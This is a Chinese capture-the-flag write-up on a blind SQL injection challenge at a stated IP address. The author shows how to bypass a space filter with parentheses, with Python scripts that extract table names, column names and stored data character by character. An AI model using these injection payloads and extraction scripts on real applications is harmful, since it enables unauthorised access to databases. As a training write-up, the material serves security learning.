因为比较菜诶,所以这道题的命令让我拼接了好久。记录在此
放出url = http://119.23.73.3:5004/
打开后我们在后面写?id=1既-->
当我们输入的信息有误后,页面就没有回显了。
所以我们得到,当命令正确之后,会有hello的回显。
我们在尝试一下,发现他给ban了空格、sub、>等等。但是我们发现其他一些基础的命令没有给ban,比如“ascii,hex,select”等常规命令。所以这里我们就要想办法用其他方法代替空格。这里我们采用()来代替空格。
这里放上payload,大家自己看一看就行
还有下面是python代码
①这个爆表名
import requests import string urll = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘1" f1 = requests.get(urll) content = f1.content s = string.printable # for i in range(10): # url = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘"+str(i)+"" # f = requests.get(url) # if f.content != content: # print f.content # print i url = "http://119.23.73.3:5004/?id=1" def getData(url): r = requests.get(url) return r.text def getTables(): tables = ‘‘ for i in range(50): for j in s: url2 = url + "‘and(select(hex(mid(group_concat(table_name)," + str(i+1) + ",1)))from(information_schema.tables)where(table_schema=database()))=‘" + (j).encode(‘hex‘) #text = getData(url2) f = requests.get(url2) text = f.text if ‘Hello‘ in text: tables += j #print j #print tables break print tables
我们得到-->
②之后是列名
import requests import string urll = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘1" f1 = requests.get(urll) content = f1.content s = string.printable # for i in range(10): # url = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘"+str(i)+"" # f = requests.get(url) # if f.content != content: # print f.content # print i url = "http://119.23.73.3:5004/?id=1" def getColumn(): Column = ‘‘ for i in range(50): for j in s: url2 = url + "‘and(select(hex(mid(group_concat(Column_name)," + str(i+1) + ",1)))from(information_schema.columns)where(table_schema=database()and(table_name=‘do_y0u_l1ke_long_t4ble_name‘)))=‘" + (j).encode(‘hex‘) #text = getData(url2) f = requests.get(url2) text = f.text if ‘Hello‘ in text: Column += j #print j #print tables break print Column
得到结果
③爆数据
def getContent(): content = ‘‘ for i in range(50): for j in s: url2 = url + "‘and(select(hex(mid(group_concat(d0_you_als0_l1ke_very_long_column_name)," + str(i+1) + ",1)))from(do_y0u_l1ke_long_t4ble_name))=‘" + (j).encode(‘hex‘) #text = getData(url2) f = requests.get(url2) text = f.text if ‘Hello‘ in text: content += j #print j #print tables break print content
直接接爆出来了。
大家在写这个题目的时候一定要注意url2的构造,,,我就是因为空格均为(),所以老搞不清里面的东西。大家写的时候一定要注意哦。。
还有,最后的值可以用hex比较,也可以用ascii比较。